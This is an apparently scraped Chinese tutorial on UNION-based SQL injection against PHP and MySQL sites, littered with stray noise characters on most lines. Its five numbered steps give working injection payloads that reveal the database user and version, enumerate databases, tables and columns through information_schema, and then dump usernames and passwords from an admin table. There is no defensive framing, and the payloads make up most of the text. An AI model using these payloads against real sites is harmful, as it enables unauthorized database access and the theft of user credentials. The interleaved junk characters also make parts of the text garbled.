2 x" b+ M) L/ E
教程内容:Mysql 5+php 注入- | S) q) h2 d3 c& v- @% `
* K2 c$ Y& b1 l$ c# l
/ a: x% d( L8 j$ U
2 J8 ~; J$ D/ ]; `3 g一.查看MYSQL基本信息(库名,版本,用户)* }# n6 G; U; |3 U/ C9 l4 T
( ?2 a9 w0 K4 U& b
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
* j8 J5 @: _2 d8 |
1 b" N' W8 b* ]" A4 ?- m4 b- u二.查数据库$ X6 @2 F2 M* |4 Z. w
! {- l: F4 m+ |& D" c# s+ X; L
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*# O% t& ]( `4 ~7 j
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
- A5 u" F" G: \6 {7 C
+ v! f/ q' F/ X! x: d三.暴表, u/ q3 R9 e% L7 k! c$ }
& i" v, u3 J8 k' l) V- x
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
! j: |- s; ^5 x0 h" y: ?
. h5 S6 Z/ j% k) Q& @: xlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
+ P* e) d4 |, n5 S; S i6 G
5 C9 ?9 K) Z' q0 {' p$ v四.暴字段
, j; N, N1 s9 b# E
# {6 r, W4 m; j d4 i( Tand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
" }8 ^, ?" _9 [) \
3 e# J# l1 O4 y0 slimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
! V) A6 M2 ]8 }; U3 v# h8 @0 _8 Z6 k: U- e9 [2 {# c8 u
五.暴数据
9 a, \# R7 y) X3 P. t1 I
0 H' k3 v) a/ K; A1 kand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
1 @/ j c1 y7 D, J3 U8 Z7 ~' y2 t0 @+ o, W+ l; y9 H4 z
7 ~3 j2 c! K V7 C! v6 Q这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
7 W8 j X7 s% H: C# g0 u( k |